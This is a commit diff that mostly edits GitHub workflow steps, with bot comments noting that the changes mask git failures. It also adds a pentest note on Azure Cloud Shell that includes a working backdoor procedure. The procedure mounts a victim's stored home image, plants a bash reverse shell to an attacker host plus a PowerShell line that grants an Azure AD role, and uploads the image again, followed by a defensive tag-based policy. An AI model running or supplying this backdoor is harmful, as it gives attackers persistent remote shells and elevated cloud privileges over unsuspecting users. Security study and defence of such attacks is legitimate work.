fix workflows

This commit is contained in:
Carlos Polop
2025-02-21 14:55:41 +01:00
parent 8fa715b08d
commit c6b3795cc5
17 changed files with 133 additions and 37 deletions


@@ -37,7 +37,7 @@ jobs:
- name: Update searchindex.js in repo
run: |
git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud
(git config --global --add safe.directory /__w/hacktricks-cloud/hacktricks-cloud
git pull
git config --global user.email "build@example.com"
git config --global user.name "Build master"
@@ -46,7 +46,7 @@ jobs:
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
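Review bot: The `( … ) || echo "No changes to searchindex.js"` wrapper added here masks every failure in the step, not only the empty-commit case it is aimed at. Because the subshell is the left operand of `||`, bash ignores errexit inside it, so under the runner's default `bash -e` a failing `git pull`, `cp` or `git commit` no longer stops the sequence; the only status the step sees is that of the final `git push`, and even that is replaced by the echo, so a push rejected for permissions or branch-protection reasons is logged as "no changes" and the job continues into the AWS OIDC step below with an unpushed index. Guard the empty case explicitly and let real errors fail: drop the parentheses and, after `git add searchindex.js searchindex.json`, insert `if git diff --cached --quiet; then echo "No changes to searchindex.js"; exit 0; fi`, leaving `git commit` and `git push` unconditional after it. The `run:` block spans both hunks of this file and the lines between them are not shown.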


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC
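Review bot: The `( … ) || echo "No changes to searchindex.js"` wrapper hides every error in this step, not just the empty-commit case: bash ignores errexit inside a subshell that is the left operand of `||`, so a failed `git checkout`, `git pull`, `cp` or `git commit` no longer stops the sequence, and the step's outcome is the echo regardless of whether `git push` was rejected. The workflow then proceeds to the AWS OIDC step below even when the index was never pushed. Guard the empty case explicitly instead: remove the parentheses, use `git checkout "$BRANCH"` to keep the variable from word-splitting, and after `git add searchindex.js searchindex.json` insert `if git diff --cached --quiet; then echo "No changes to searchindex.js"; exit 0; fi`, keeping `git commit` and `git push` unconditional so their failures fail the step.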


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -67,13 +67,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -68,13 +68,13 @@ jobs:
- name: Update searchindex.js in repo
run: |
git checkout $BRANCH
(git checkout $BRANCH
git pull
cp book/searchindex.js searchindex.js
cp book/searchindex.json searchindex.json
git add searchindex.js searchindex.json
git commit -m "Update searchindex for $BRANCH"
git push
git push) || echo "No changes to searchindex.js"
# Login in AWs
- name: Configure AWS credentials using OIDC


@@ -10,11 +10,107 @@ There aren't permissions assigned to this service, therefore the aren't privileg
### Key Features
**Environment**:Azure Cloud Shell provides a secure environment by running on Azure Linux, Microsofts own Linux distribution designed for cloud infrastructure. All packages included in the Azure Linux repository are internally compiled by Microsoft to guard against supply chain attacks.
**Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
**$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account. Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends. To persist files across sessions, mount a storage account, which attaches automatically as **$HOME\clouddrive**, with your **$HOME** directory saved as an **.img** file in Azure File Share. However, files outside $HOME and machine states are not persisted. For securely storing secrets like SSH keys, use Azure Key Vault.
**Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
**Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs.
- **Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
- **Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
- **Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs.
- **$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account.
- Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends.
- To persist files across sessions, you are given the option to **mount a storage account**, which attaches automatically as `$HOME\clouddrive`, with your `$HOME` directory **saved as an .img file in a File Share.**
### Cloud Shell Phishing
If anattacker finds other users images in a Storage Accout he has write and read access to, he will be able to download the image, **add a bash and PS backdoor into it**, and upload it back to the Storage Account so next time the user access the shell, the **commands will be automatically executed**.
- **Download, backdoor and uplaod the image:**
```bash
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name>
# Mount image
cd /tmp/phishing_img/.cloudconsole
mkdir /tmp/cloudpoison
sudo mount acc_username.img /tmp/cloudpoison
cd /tmp/cloudpoison
sudo mkdir .config
sudo mkdir .config/PowerShell
sudo touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
sudo chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1
# Bash backdoor
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc
# PS backdoor
echo "Connect-AzureAD; Add-AzureADDirectoryRoleMember -ObjectId 1246bcfd-42dc-4bb7-a86d-3637ca422b21 -RefObjectId 1D8B2447-8318-41E5-B365-CB7275862F8A" >> .config/PowerShell/Microsoft.PowerShell_profile.ps1
cd /tmp
sudo umount /tmp/cloudpoison
# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img"
```
- **Then, phish the user to access https://shell.azure.com/**
### Find & Forbid Cloud Shell Automatic Storage Accounts
Storage accounts created by Cloud Shell are tagged with **`ms-resource-usage:azure-cloud-shell`**. Its possible to create an Azure resource policy that disable creating resources with this tag.
Find all the storage accounts created by Cloud Shell by tags:
```bash
az storage account list --output json | jq '.[] | select(.tags["ms-resource-usage"]=="azure-cloud-shell")'
```
Policy to forbid the creation of automatic storage accounts for cloud shell storage based on tags:
```json
{
displayName: "Restrict cloud shell storage account creation",
description: "Storage accounts that you create in Cloud Shell are tagged with ms-resource-usage:azure-cloud-shell. If you want to disallow users from creating storage accounts in Cloud Shell, create an Azure resource policy for tags that is triggered by this specific tag. https://learn.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#restrict-resource-creation-with-an-azure-resource-policy",
metadata: {
category: "Storage",
version: "1.0.0"
},
mode: "All",
parameters: {
effect: {
type: "String",
metadata: {
displayName: "Effect",
description: "Deny, Audit or Disabled the execution of the Policy"
},
allowedValues: [
"Deny",
"Audit",
"Disabled"
],
defaultValue: "Audit"
}
},
policyRule: {
if: {
allOf: [
{
field: "type",
equals: "Microsoft.Storage/storageAccounts"
},
{
field: "tags['ms-resource-usage']",
equals: "azure-cloud-shell"
}
]
},
then: {
effect: "[parameters('effect')]"
}
}
}
```
## References